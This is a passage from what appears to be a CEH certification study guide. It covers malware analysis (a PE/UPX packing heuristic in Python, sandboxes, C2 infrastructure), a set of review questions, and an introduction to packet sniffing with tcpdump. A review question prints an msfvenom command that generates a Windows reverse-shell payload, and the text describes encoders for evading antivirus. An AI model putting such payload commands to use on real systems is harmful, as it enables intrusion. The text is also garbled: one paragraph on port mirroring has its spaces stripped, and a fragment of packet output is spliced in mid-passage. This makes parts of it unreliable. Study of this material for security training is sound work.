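    example, not a real binary): DOS header with e_lfanew, PE signature,
    COFF header, PE32 optional header, and a section table."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_HEADER, 0x14C, len(section_names),
                       0, 0, 0, PE32_OPTIONAL_SIZE, 0x0102)
    opt = bytearray(PE32_OPTIONAL_SIZE)
    struct.pack_into("<H", opt, 0, 0x10B)        # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)   # AddressOfEntryPoint
    table = b""
    rva = 0x1000                                 # sections laid out 0x1000 apart
    for name in section_names:
        table += struct.pack(SECTION_HEADER, name.encode().ljust(8, b"\x00"),
                             0x1000, rva, 0x200, 0, 0, 0, 0, 0, 0x60000020)
        rva += 0x1000
    return dos + b"PE\x00\x00" + coff + bytes(opt) + table


def parse_pe(data):
    """Return (AddressOfEntryPoint, list of section dicts) from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from(COFF_HEADER, data, coff_off)
    opt_off = coff_off + struct.calcsize(COFF_HEADER)
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic not in (0x10B, 0x20B):              # PE32 or PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]
    sec_off = opt_off + opt_size
    sections = []
    for i in range(nsections):
        fields = struct.unpack_from(SECTION_HEADER, data, sec_off + 40 * i)
        name, vsize, vaddr, rawsize = fields[0], fields[1], fields[2], fields[3]
        sections.append({"name": name.rstrip(b"\x00").decode("ascii", "replace"),
                         "vaddr": vaddr, "size": max(vsize, rawsize)})
    return entry, sections


def entry_section(data):
    """Name of the section whose RVA range contains the entry point, or None."""
    entry, sections = parse_pe(data)
    for s in sections:
        if s["vaddr"] <= entry < s["vaddr"] + s["size"]:
            return s["name"]
    return None


def looks_packed(data):
    """The chapter's static-analysis heuristic: an entry point inside a
    section carrying the UPX packer's name is a strong sign of packing."""
    name = entry_section(data)
    return name is not None and name.upper().startswith("UPX")


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def flip_one_byte(data, offset):
    """Return a copy of data with one bit of one byte changed."""
    buf = bytearray(data)
    buf[offset] ^= 0x01
    return bytes(buf)


if __name__ == "__main__":
    packed = build_sample_pe(["UPX0", "UPX1"], 0x2010)   # entry inside UPX1
    plain = build_sample_pe([".text", ".data"], 0x1040)  # entry inside .text
    print("packed sample:", entry_section(packed), looks_packed(packed))
    print("plain sample: ", entry_section(plain), looks_packed(plain))
    # One bit changed in the unused DOS stub: the hash is entirely different,
    # but the section-based verdict is unchanged.
    variant = flip_one_byte(packed, 0x10)
    print("hash changed: ", sha256_hex(packed) != sha256_hex(variant))
    print("still packed: ", looks_packed(variant))
```

The parser reads only the fields it needs (e_lfanew, the section count and optional-header size from the COFF header, AddressOfEntryPoint, and the section table), which is enough to reproduce the UPX check and to see why a hash-only signature is brittle against a one-byte edit while a structural property such as the entry section survives it. Real packed samples vary the section names and sizes far more than this constructed image does, so the check is a starting heuristic rather than a verdict.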
The other type of analysis is dynamic, which means running the program and looking at what the malware does. This must be done with care because you don't want to infect your own machine, nor do you want to expose other systems on your network to potential infection. Running malware inside virtual machines can help here, though some malware will know it is running inside a virtual machine and not fully deploy. You can use a sandboxed environment to run the program, and there are sandboxes that will automate the analysis for you. One of these is Cuckoo Sandbox, which can be installed on your own hardware, or there are some openly available installations online. Using a debugger can help with dynamic inspection because you can control the run of the program.

You may, in the course of your testing of your target organization, want to make use of malware. Because you are behaving ethically, you don't want to use actual malware, whose purpose is really malicious. You may, though, want to install backdoors or test whether operations staff will detect the existence of malware. You can do this by writing your own, taking into consideration your target platform and architecture as well as other requirements. Python is a popular programming language, but Windows systems may not have a Python interpreter installed like a macOS or Linux system would. Windows would have PowerShell installed, though. A compiled program, written using a language like C, would generally work because all elements of the program can be compiled in rather than relying on libraries to be installed.

Malware will often have infrastructure associated with it. You may have heard of botnets. Botnets are collections of infected systems that have command-and-control systems that are used to tell the bot endpoints what they should be doing. Even if there isn't an entire network of command-and-control systems, there may be at least one system available for infected systems to connect to so as to allow remote control from an attacker. This is done because firewalls generally allow outbound traffic, whereas inbound traffic will get blocked. Therefore, connections are best initiated from inside the network. When connections are initiated from the inside, there has to be a server for the inside system to connect to. Even if there aren't a lot of systems, this is still infrastructure.

Review Questions

You can find the answers in the appendix.

1. In a botnet, what are the systems that tell individual bots what to do called?
   A. C2 servers
   B. IRC servers
   C. HTTP servers
   D. ISC2 servers

2. What is the primary difference between a worm and a virus?
   A. A worm uses polymorphic code.
   B. A virus uses polymorphic code.
   C. A worm can self-propagate.
   D. A virus can self-propagate.

3. What is one advantage of static analysis over dynamic analysis of malware?
   A. Malware is guaranteed to deploy.
   B. Dynamic analysis is untrustworthy.
   C. Static analysis limits your exposure to infection.
   D. Static analysis can be run in virtual machines.

4. What would you use VirusTotal for?
   A. Checking your system for viruses
   B. Endpoint protection
   C. As a repository of malware research
   D. Identifying malware against antivirus engines

5. What are two sections you would commonly find in a portable executable file?
   A. Text and binary
   B. Binary and data
   C. Addresses and operations
   D. Text and data

6. What could you use to generate your own malware?
   A. Empire
   B. Metasploit
   C. Rcconsole
   D. IDA Pro

7. What is the purpose of a packer for malware?
   A. To obscure the actual program
   B. To ensure that the program is all binary
   C. To compile the program into a tight space
   D. To remove null characters

8. What is the primary purpose of polymorphic code for malware programs?
   A. Efficiency of execution
   B. Propagation of the malware
   C. Antivirus evasion
   D. Faster compilation

9. What would be one reason not to write malware in Python?
   A. The Python interpreter is slow.
   B. The Python interpreter may not be available.
   C. Library support is inadequate.
   D. Python is a hard language to learn.

10. What would you use Cuckoo Sandbox for?
   A. Static analysis of malware
   B. Malware development
   C. Dynamic analysis of malware
   D. Manual analysis of malware

11. If you wanted a tool that could help with both static and dynamic analysis of malware, which would you choose?
   A. Cutter
   B. IDA
   C. PE Explorer
   D. MalAlyzer

12. What is the purpose of using a disassembler?
   A. Converting opcodes to mnemonics
   B. Converting mnemonics to opcodes
   C. Translating mnemonics to operations
   D. Removing the need for an assembler

13. What does the malware that is referred to as a dropper do?
   A. Drops antivirus operations
   B. Drops CPU protections against malicious execution
   C. Drops files that may be more malware
   D. Drops the malware into the Recycle Bin

14. Why would you use an encoder when you are creating malware using Metasploit?
   A. To compile the malware
   B. To evade antivirus
   C. To evade user detection
   D. To compress the malware

15. If you were to see the following command in someone's history, what would you think had happened?
   msfvenom -i 5 -p windows/x64/shell_reverse_tcp -o program
   A. A poison pill was created.
   B. A malicious program was generated.
   C. Existing malware was encoded.
   D. Metasploit was started.

16. What is the difference between a virus and ransomware?
   A. Ransomware may be a virus.
   B. Ransomware includes Bitcoins.
   C. Ransomware is generated only in Russia.
   D. A virus runs only on Windows systems.

17. Why would someone use a Trojan?
   A. It acts as malware infrastructure.
   B. It evades antivirus.
   C. It pretends to be something else.
   D. It's polymorphic.

18. Which of these tools would be most beneficial when trying to dynamically analyze malware?
   A. Cutter
   B. OllyDbg
   C. Metasploit
   D. AV-Test

19. Which end of a client-server communication goes on the infected system if it is communicating with infrastructure? __________________

20. Which of these would be a reason why it is best for communications to originate from inside the infected network?
   A. Antivirus
   B. Virtual machines
   C. Intrusion detection
   D. Firewall

21. What is the tactic of allowing software to continue running across reboots of a system called?
   A. Obfuscation
   B. Persistence
   C. Disassembly
   D. Packing

22. What tool could you use to deeply analyze malicious software?
   A. strings
   B. Hashing
   C. Ghidra
   D. Metasploit

23. What practice could an organization use to protect itself against data loss from ransomware?
   A. Implement anti-malware
   B. Implement endpoint detection and response
   C. Sweep for indicators of compromise
   D. Implement good backup practices

24. What piece of software could you use to recover from a ransomware attack?
   A. Decryptor
   B. Encryptor
   C. Anti-malware
   D. Endpoint detection and response

25. What persistence mechanism might allow malware to protect itself against anti-malware software?
   A. Scheduled tasks
   B. WMI event subscriptions
   C. Pre-boot malware
   D. HKEY_LOCAL_MACHINE registry key

Chapter 9 ■ Sniffing

THE FOLLOWING CEH EXAM TOPICS ARE COVERED IN THIS CHAPTER:
✓ Communication on protocols
✓ Network/wireless sniffers
✓ TCP/IP networking

It used to be that sniffing was an expensive proposition. The reason is that there was a special network interface required to be able to capture the packets. On top of that was the software. If you wanted to capture packets, you needed special hardware and software, and there weren't many companies that could sell you that. Then came consumer network interfaces that didn't cost a fortune and could forward all packets up through the interface into the operating system. Finally, there was a piece of software called Ethereal. Suddenly, getting your packets captured was free.

Now there are several ways to capture packets. The most common software now to capture packets is freely available. Some of the software is command-line oriented, which is really helpful if you are connected to a system over SSH or other mechanisms that provide only a text-oriented interface. This sort of software is not great for analysis if you need to dig into the packet content and see entire streams, not to mention if you want to go deeper with your analysis and get statistics and graphs. Fortunately, there is software for that purpose. It was once called Ethereal, but it's currently called Wireshark, and it has a lot of capabilities to enable deep analysis of the packets.

A challenge we have today is that most networks are switched. This means the network is essentially segmented. Only packets that are addressed to you in some way will get sent to your network interface. Since we may have the ability to see the data anyway, through the applications transmitting the messages, packet capture isn't nearly as interesting if all we can do is look at messages to and from the device we are on. We need ways to get the rest of the traffic on the network to a system we have control of. Fortunately, there are several ways we can do that. We can even take a targeted approach at it, determining exactly which systems we want to get traffic from.

We also need to deal with encryption. Web traffic today generally defaults to using Transport Layer Security (TLS), which encrypts all messages. This is a challenging issue, since one of the predominant protocols becomes obscured to us. Fortunately, there are some ways around that.

Packet Capture

Why is packet capture so important? If you can get to the right place in the network to be able to capture the data, you can potentially grab usernames and passwords or other authentication/authorization traffic. An attacker could potentially grab credit card information or other personally identifiable information (PII) that is marketable. Depending on the organization, there could also be personal health information (PHI). There may be other information available on the network that could be useful as you are maneuvering through your client's assets.

Packet capturing is the process of acquiring network traffic that is addressed to systems other than your own. You can certainly capture packets that are only addressed to your system, but that's not especially interesting since you're already getting those. Network interface cards (NICs) are programmed to only forward frames up to the operating system whose destination MAC address is either the MAC address of the NIC or the broadcast MAC address (ff:ff:ff:ff:ff:ff). To force the NIC to forward all messages up to the operating system, the card has to be put into what is called promiscuous mode. This just gets the NIC to forward all messages up, behaving promiscuously.

Each layer of the Open Systems Interconnection (OSI) model has a different name for the chunk of data associated with it. This is called the protocol data unit (PDU). At layer 2, where we are grabbing the messages off the network, since they include the layer 2 header with MAC addresses, the PDU is called a frame. Technically, we are capturing frames. It's called packet capturing, though. A packet is the PDU for layer 3, which is the IP layer. At layer 4, TCP's PDU is a segment, while UDP's is a datagram. For our purposes, I'll be talking about packet capturing unless there is something related to the MAC address or the NIC. Then I'll be using the term frame.

Once the operating system, really the networking stack in the operating system, has the frames, they can be intercepted by a piece of software. Once the software has the message, packet capturing software will parse the message, extracting information out of each protocol header. A command-line program, like tcpdump, which we will be looking at, may display information out of the different headers. You could also be using a graphical user interface (GUI), which has more options for how to display the header data, as well as the payload data. Headers are the fields that are specific to the protocol. They provide details specific to the protocol—instructions, as it were, to the protocol on how to behave. The data that is being carried from one endpoint to another is called the payload. This payload may be broken up between multiple packets and
certainly multiple frames. Fragmentation may be forced by the maximum transmission unit (MTU) at layer 2 (the frame layer). This is one reason it's easier to use a GUI-based program to analyze packets, even if we are capturing them with another tool. A program like Wireshark helps to make packet analysis much easier than if we were trying to review all the details on the command line.

tcpdump

For decades now, Unix systems have had programs that could capture packets. The program tcpdump was first written in the late 1980s and was later ported to other Unix implementations. It is a fairly easy to use but also powerful utility that was standardized in the late 1990s, pulling all the divergent implementations together. You will find this tool available on most, if not all, Linux distributions as well as the different Berkeley Software Distribution (BSD) distributions. It is a command-line program that can be used to give you an idea of what is happening on the network, but it can also be used to capture traffic and store that traffic in a file that can be opened later on.

In the following code listing, you can see what it takes to run tcpdump. This was done from a Kali Linux system. This is all that it would take. You can see that the output shows mostly essential header information about each packet that has been captured. This is one reason this is called packet capturing. You may notice that all the layer 2 information has been removed. All you see in the output is the layer 3 information, along with a little layer 4. tcpdump has also helpfully indicated some of the details of the Application layer traffic. You can see, first of all, that there are DNS requests. There is a lookup of a hostname from an IP address. This is a pointer (PTR) record that is sometimes called a reverse lookup.

tcpdump with No Parameters

    [email protected]:~# tcpdump
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
    18:48:25.045517 ARP, Request who-has testwifi.here tell localhost.lan, length 46
    18:48:25.046237 IP quiche.lan.39988 > testwifi.here.domain: 58469+ PTR? 1.86.168.192.in-addr.arpa. (43)
    18:48:25.048456 IP testwifi.here.domain > quiche.lan.39988: 58469* 1/0/0 PTR testwifi.here. (95)
    18:48:25.048594 IP quiche.lan.58395 > testwifi.here.domain: 35036+ PTR? 22.86.168.192.in-addr.arpa. (44)
    18:48:25.050179 IP testwifi.here.domain > quiche.lan.58395: 35036* 1/0/0 PTR localhost.lan. (97)
    18:48:25.050311 IP quiche.lan.56311 > testwifi.here.domain: 38920+ PTR? 57.86.168.192.in-addr.arpa. (44)
    18:48:25.051758 IP testwifi.here.domain > quiche.lan.56311: 38920* 1/0/0 PTR quiche.lan. (94)
    18:48:25.458252 IP6 fe80::3847:ce36:d1cd:7729.61478 > ff02::c.1900: UDP, length 146
    18:48:25.458501 IP quiche.lan.56653 > testwifi.here.domain: 33204+ PTR? c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa. (90)
    18:48:25.467112 IP testwifi.here.domain > quiche.lan.56653: 33204 NXDomain 0/1/0 (154)
    18:48:25.467781 IP quiche.lan.44374 > testwifi.here.domain: 6986+ PTR? 9.2.7.7.d.c.1.d.6.3.e.c.7.4.8.3.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa. (90)
    18:48:25.488710 IP testwifi.here.domain > quiche.lan.44374: 6986 NXDomain 0/1/0 (154)

One of the issues with tcpdump, which you can see in the preceding code, is that by default it resolves all numeric addresses to ones that are more human-friendly. The hostnames and also the service ports are resolved to names from numeric addresses. The second line, for instance, shows that the destination address is testwifi.here, and the port is called domain. The full address is listed in tcpdump as w.x.y.z.p, where w.x.y.z is the IP address and p is the port number. So, when we see testwifi.here.domain here, testwifi.here is the hostname, resolved from the IP address, and domain is the service port. This tells us it's a DNS request. Many of the DNS requests you see are a result of a packet that has come in. You'll see the DNS request show before the packet because in order to display the packet, the DNS request has to be issued and come back. You can easily change this behavior, since the DNS requests can get very noisy and it's hard to weed your way through to get to the traffic you really want to see. This is done by just adding -n to the command line. What you end up with is something like you see here.

tcpdump with No Name Resolution

    [email protected]:~# tcpdump -n
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
    20:42:16.326940 IP 192.168.86.210.40608 > 239.255.255.250.1900: UDP, length 558
    20:42:16.587114 IP 192.168.86.210.40608 > 239.255.255.250.1900: UDP, length 546
    20:42:16.703469 IP 192.168.86.24.5353 > 224.0.0.251.5353: 0 [5a] [5q] [1au] PTR (QM)? _homekit._tcp.local. PTR (QM)? _companion-link._tcp.local. TXT (QM)? 9EA05B22-BBCC-5F9C-9C4B-10A7538DAAD9._homekit._tcp.local. TXT (QU)? milobloom (2)._companion-link._tcp.local. PTR (QM)? _sleep-proxy._udp.local. (282)
    20:42:16.704314 IP6 fe80::10ba:d862:9623:e420.5353 > ff02::fb.5353: 0 [5a] [5q] [1au] PTR (QM)? _homekit._tcp.local. PTR (QM)? _companion-link._tcp.local. TXT (QM)? 9EA05B22-BBCC-5F9C-9C4B-10A7538DAAD9._homekit._tcp.local. TXT (QU)? milobloom (2)._companion-link._tcp.local. PTR (QM)? _sleep-proxy._udp.local. (282)
    20:42:16.832644 IP 192.168.86.210.40608 > 239.255.255.250.1900: UDP, length 536
    20:42:16.845825 IP 192.168.86.46.5353 > 224.0.0.251.5353: 0*- [0q] 1/0/1 (Cache flush) TXT "si=AAB36E20-CDBD-4E60-BEEB-1BC0A3AB8E2D" (141)
    20:42:16.846030 IP6 fe80::1cbd:790c:b9f2:aeb0.5353 > ff02::fb.5353: 0*- [0q] 1/0/1 (Cache flush) TXT "si=AAB36E20-CDBD-4E60-BEEB-1BC0A3AB8E2D" (141)
    20:42:16.885944 IP 192.168.86.49.5353 > 224.0.0.251.5353: 0*- [0q] 1/0/1 (Cache flush) TXT "rpBA=AC:C5:14:0E:E0:35" "rpAD=c77102094021" "rpHI=f27b7868fd6f" "rpHN=ce75eb6a989e" "rpVr=164.16" "rpHA=ae260764c13d" (192)
    20:42:16.885964 IP6 fe80::1882:675c:7bdd:2de3.5353 > ff02::fb.5353: 0*- [0q] 1/0/1 (Cache flush) TXT "rpBA=AC:C5:14:0E:E0:35" "rpAD=c77102094021" "rpHI=f27b7868fd6f" "rpHN=ce75eb6a989e" "rpVr=164.16" "rpHA=ae260764c13d" (192)

Much of what we see is fairly straightforward, though it may or may not be especially useful. As an example, the first captured packet is an IP packet. It tells us that right after the timestamp. Then we see the source address followed by >, showing the direction, and then the destination address. This tells us that the packet is UDP and the length is 558. What we can also tell there is that the UDP datagram is the simple service discovery protocol (SSDP), part of universal plug and play (UPnP). We can tell this even without the assistance of tcpdump by just looking up the destination port number, if we don't happen to know that 1900 is a UPnP port. The source port for the datagram is just an ephemeral port, assigned by the operating system when the message is sent out on the network.

You may have noticed that the user logged into the system is root. Because we have to set a parameter in the hardware, we have to run tcpdump as an administrative user. On Linux, this is root. On Windows, it would be anyone in the Administrators group or another group that had permissions to interface with the network hardware like that.

We don't have to live with just the default level of detail. We can also ask for more detail about the packets that have been captured. There are multiple levels of verbosity that we can request of tcpdump. To get more verbose, we add -v to the command line. If we want even more detail than that, we use -vv and then -vvv. In the following listing, you can see a tcpdump capture with -vv as a command-line parameter to get additional details. Additionally, there is a parameter setting the snapshot length to 0. In practice, this sets the number of bytes per packet to 262,144, which is the default setting. This wasn't always the case. It was once the case that the snapshot length was very short, so to get complete packets, you had to tell tcpdump not to limit the number of bytes captured.

tcpdump Capturing with Additional Verbosity

    [email protected]:~# tcpdump -vv -s 0
    tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
    10:40:27.047708 IP (tos 0x0, ttl 1, id 48781, offset 0, flags [DF], proto UDP (17), length 228)
        samsung.lan.8001 > st-routers.mcast.net.8001: [udp sum ok] UDP, length 200
    10:40:27.048568 IP (tos 0x0, ttl 64, id 64646, offset 0, flags [DF], proto UDP (17), length 68)
        quiche.lan.45867 > testwifi.here.domain: [bad udp cksum 0x2dcd -> 0x690e!] 26697+ PTR? 7.0.0.224.in-addr.arpa. (40)
    10:40:27.068536 IP (tos 0x0, ttl 64, id 16931, offset 0, flags [DF], proto UDP (17), length 102)
        testwifi.here.domain > quiche.lan.45867: [udp sum ok] 26697 q: PTR? 7.0.0.224.in-addr.arpa. 1/0/0 7.0.0.224.in-addr.arpa. PTR st-routers.mcast.net. (74)
    10:40:27.068803 IP (tos 0x0, ttl 64, id 64650, offset 0, flags [DF], proto UDP (17), length 72)
        quiche.lan.46802 > testwifi.here.domain: [bad udp cksum 0x2dd1 -> 0x7eb6!] 42424+ PTR? 22.86.168.192.in-addr.arpa. (44)
    10:40:27.070769 IP (tos 0x0, ttl 64, id 16932, offset 0, flags [DF], proto UDP (17), length 123)
        testwifi.here.domain > quiche.lan.46802: [udp sum ok] 42424* q: PTR? 22.86.168.192.in-addr.arpa. 1/0/0 22.86.168.192.in-addr.arpa. PTR samsung.lan. (95)
    10:40:27.070930 IP (tos 0x0, ttl 64, id 64651, offset 0, flags [DF], proto UDP (17), length 71)
        quiche.lan.49820 > testwifi.here.domain: [bad udp cksum 0x2dd0 -> 0x05f9!] 46654+ PTR? 1.86.168.192.in-addr.arpa. (43)
    10:40:27.072770 IP (tos 0x0, ttl 64, id 16933, offset 0, flags [DF], proto UDP (17), length 123)
        testwifi.here.domain > quiche.lan.49820: [udp sum ok] 46654* q: PTR? 1.86.168.192.in-addr.arpa. 1/0/0 1.86.168.192.in-addr.arpa. PTR testwifi.here. (95)
    10:40:27.072857 IP (tos 0x0, ttl 64, id 64652, offset 0, flags [DF], proto UDP (17), length 72)
        quiche.lan.55520 > testwifi.here.domain: [bad udp cksum 0x2dd1 -> 0x3ef4!] 48745+ PTR? 57.86.168.192.in-addr.arpa. (44)
    10:40:27.170687 STP 802.1d, Config, Flags [none], bridge-id 7000.2c:08:8c:1c:3b:db.8001, length 43
        message-age 0.00s, max-age 20.00s, hello-time 1.00s, forwarding-delay 4.00s
        root-id 7000.2c:08:8c:1c:3b:db, root-pathcost 0

With default tcpdump settings, you get the IP header information where it's relevant to the packet—meaning fields of substance are set. When you add verbosity, you get details about the layer 4 headers. If you look at any of the UDP packets, you will see that there is a note saying the checksum is okay, meaning tcpdump performed the calculation of the checksum on the message and got the same value as the one in the packet. In the case of TCP segments, you would get details like the sequence and acknowledgment numbers as well as the flags set.

So far, all we have seen is the protocol headers. There hasn't been any payload data. We can take a look at the payload using the -X parameter. This performs a hex dump of the payload of the message. Hexadecimal (hex) dumps show each byte in its hexadecimal representation. It also provides an ASCII decode of each byte. This means if the ASCII value is a printable character, you will see that printable character on the right side. Even in cases where you see printable characters, the meaning of the byte to the protocol in use may not be that character. It may just be the numeric value of that byte.

Hexadecimal Representation of Packet

    [email protected]:~# tcpdump -i eth0 -X
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
    10:49:35.174771 STP 802.1d, Config, Flags [none], bridge-id 7000.2c:08:8c:1c:3b:db.8001, length 43
        0x0000:  0000 0000 0070 002c 088c 1c3b db00 0000  .....p.,...;....
        0x0010:  0070 002c 088c 1c3b db80 0100 0014 0001  .p.,...;........
        0x0020:  0004 0000 0000 0000 0000 00              ...........
    10:49:35.578186 IP samsung.lan.8001 > st-routers.mcast.net.8001: UDP, length 200
        0x0000:  4500 00e4 c563 4000 0111 bcdf c0a8 5616  E....c@.......V.
        0x0010:  e000 0007 1f41 1f41 00d0 9a56 7b22 6461  .....A.A...V{"da
        0x0020:  7461 223a 7b22 7631 223a 7b22 7572 6922  ta":{"v1":{"uri"
        0x0030:  3a22 6874 7470 3a2f 2f31 3932 2e31 3638  :"http://192.168
        0x0040:  2e38 362e 3232 3a38 3030 312f 6d73 2f31  .86.22:8001/ms/1
        0x0050:  2e30 2f22 7d2c 2276 3222 3a7b 2275 7269  .0/"},"v2":{"uri
        0x0060:  223a 2268 7474 703a 2f2f 3139 322e 3136  ":"http://192.16
        0x0070:  382e 3836 2e32 323a 3830 3031 2f61 7069  8.86.22:8001/api
        0x0080:  2f76 322f 227d 7d2c 2272 656d 6f74 6522  /v2/"}},"remote"
        0x0090:  3a22 312e 3022 2c22 7369 6422 3a22 7575  :"1.0","sid":"uu
        0x00a0:  6964 3a32 6239 3562 6466 652d 6138 3033  id:2b95bdfe-a803
        0x00b0:  2d34 3234 662d 3931 3530 2d34 3532 3434  -424f-9150-45244
        0x00c0:  6338 3162 3862 3022 2c22 7474 6c22 3a38  c81b8b0","ttl":8
        0x00d0:  3030 302c 2274 7970 6522 3a22 616c 6976  000,"type":"aliv
        0x00e0:  6522 7d0a                                e"}.
    10:49:35.578979 IP quiche.lan.60408 > testwifi.here.domain: 10006+ PTR? 7.0.0.224.in-addr.arpa. (40)
        0x0000:  4500 0044 163c 4000 4011 f6e1 c0a8 5639  E..D.<@.@.....V9

    yazpistachio.lan.64631: Flags [P.], seq 3616191731:3616191919, ack 453098787, win 315, options [nop,nop,TS val 16893480 ecr 1259709774], length 188
    18:32:07.836406 IP quiche.lan.60511 > testwifi.here.domain: 58726+ PTR? 26.86.168.192.in-addr.arpa. (44)
    18:32:07.838352 IP testwifi.here.domain > quiche.lan.60511: 58726* 1/0/0 PTR yazpistachio.lan. (100)
    18:32:07.838530 IP quiche.lan.60657 > testwifi.here.domain: 4670+ PTR? 57.86.168.192.in-addr.arpa. (44)
    18:32:07.840275 IP testwifi.here.domain > quiche.lan.60657: 4670* 1/0/0 PTR quiche.lan. (94)
    18:32:07.840505 IP quiche.lan.ssh > yazpistachio.lan.64631: Flags [P.], seq 188:408, ack 1, win 315, options [nop,nop,TS val 16893485 ecr 1259709774], length 220

You can combine different filter primitives. For example, you can see in the following code listing how you would capture TCP packets that either came from or were going to the host 192.168.86.1. With complex filters, and also for clarity, you can use parentheses to isolate one of the parameters. You'll notice the backslashes that are used here to make sure the Linux shell doesn't try to interpret them, so that they are passed as parentheses to tcpdump.

Complex Filters with BPF

    [email protected]:~# tcpdump tcp and \(host 192.168.86.1\)
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
    18:41:33.287262 IP quiche.lan.43790 > testwifi.here.http: Flags [S], seq 674275431, win 29200, options [mss 1460,sackOK,TS val 2412954967 ecr 0,nop,wscale 7], length 0
    18:41:33.288206 IP testwifi.here.http > quiche.lan.43790: Flags [S.], seq 239316039, ack 674275432, win 28960, options [mss 1460,sackOK,TS val 235265600 ecr 2412954967,nop,wscale 7], length 0
    18:41:33.288269 IP quiche.lan.43790 > testwifi.here.http: Flags [.], ack 1, win 229, options [nop,nop,TS val 2412954968 ecr 235265600], length 0
    18:41:37.111956 IP quiche.lan.43790 > testwifi.here.http: Flags [F.], seq 1, ack 1, win 229, options [nop,nop,TS val 2412958792 ecr 235265600], length 0
    18:41:37.113495 IP testwifi.here.http > quiche.lan.43790: Flags [F.], seq 1, ack 2, win 227, options [nop,nop,TS val 235265982 ecr 2412958792], length 0
    18:41:37.113515 IP quiche.lan.43790 > testwifi.here.http: Flags [.], ack 2, win 229, options [nop,nop,TS val 2412958793 ecr 235265982], length 0

Keep in mind that when you are using BPF on the command line with tcpdump, you are using a capture filter. This means that you won't see anything that doesn't pass the filter. If you are writing your capture to a file, you won't have anything that doesn't pass the filter. If you are expecting to perform analysis on the captured file later, you should make sure you won't need those packets later. Think carefully about the filters you use before applying them to a capture.

Port Mirroring/Spanning

Back when everything used simple hubs, which were just electrical repeaters with no intelligence, getting traffic from everywhere on the network was easy. Then came switches. These are devices that improve the performance and security of a network by doing filtering at layer 2 at the network device. A switch knows which systems are connected to it at which port. When a frame comes in with a destination MAC address, the switch can look up the port where the MAC address is and send the frame out that port to the destination system. This way, other systems on the network never see that frame pass their network interface. This makes capturing packets more difficult if
youarelookingfortrafficthatisn’tpassingyournetworkinterface.Onewaytogetaroundthatistohaveaccesstotheswitch.Thiswouldallowyoutoconfiguretheswitchtomirrorports.Itmeansanytrafficthatpassesthroughoneportwouldbemirroredtoanotherport.Youmaybeabletomirrormultipleportstoasingleport,whichwouldletyoumonitortraffictoandfrommultiplesystems.Ifyoucouldmonitoronlyasingleport,youcouldconsidermirroringtheportthatledtoagateway/routingdevice.Thismeansyouareseeingtrafficenteringandexitingthenetwork,whichcouldpotentiallygiveyoumoreaccesstosensitiveinformationthanifyouweretojustmonitorasingleendpoint.OnCiscodevices,thefeatureusedforconfiguringportmirroringisreferredtoasSwitchedPortAnalyzer(SPAN).Whenyousetupportmirroring,youareconfiguringaSPANport.Asaresult,youmayheartheprocessreferredtoasportspanning.Otherswitchvendorsmayuseotherterminologyforthisprocess.Oneconsiderationwhenyouaremirroringportsistheideaofoversubscription.Ifyouhavefive1gswitchportsandyouaremirroringthemouttoasingle1gport,youhavethepossibilityofoversubscribingthereceivingport.Thismeansyoucouldeasilydroppacketsyouweretryingtocaptureandthepacketswouldbebasicallyrandom,dependingonwhenyouhavetoomuchdatacomingintobeabletosendout.PacketAnalysis 
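The following Python program is an added example and is not code from the book or from the tcpdump project. It shows what the verbose listings above are reporting: it decodes Ethernet, IPv4, UDP and TCP headers from raw frames, recomputes the transport checksum over the IPv4 pseudo-header exactly as tcpdump -vv does to decide between [udp sum ok] and [bad udp cksum ...], and then applies a capture filter equivalent to `tcp and host 192.168.86.1`, which matches a host in either the source or the destination. Every frame, address and MAC in it is constructed for the example; the "bad checksum" frame is built to look like a datagram captured before the card's checksum offload filled the field in.

```python
"""Added example, not from the book: parse Ethernet/IPv4/UDP/TCP headers from raw
frames, verify the transport checksum the way tcpdump -vv reports it ([udp sum ok]
versus [bad udp cksum ...]), and apply a capture filter equivalent to
`tcp and host 192.168.86.1`. All frames, addresses and MACs below are constructed."""
import struct
from ipaddress import IPv4Address

# Constructed Ethernet header: destination MAC, source MAC, EtherType IPv4.
ETH_HDR = bytes.fromhex("020000000001") + bytes.fromhex("020000000002") + b"\x08\x00"
UDP, TCP = 17, 6


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over big-endian 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def transport_checksum(src: bytes, dst: bytes, proto: int, segment: bytes) -> int:
    """Checksum over the IPv4 pseudo-header plus the segment with its checksum field zeroed."""
    off = 6 if proto == UDP else 16  # offset of the checksum field in the UDP / TCP header
    pseudo = src + dst + struct.pack("!BBH", 0, proto, len(segment))
    return checksum(pseudo + segment[:off] + b"\x00\x00" + segment[off + 2:])


def build_ipv4(src: str, dst: str, proto: int, payload: bytes, ttl: int = 64) -> bytes:
    """Minimal 20-byte IPv4 header (DF set) with a correct header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0x4000,
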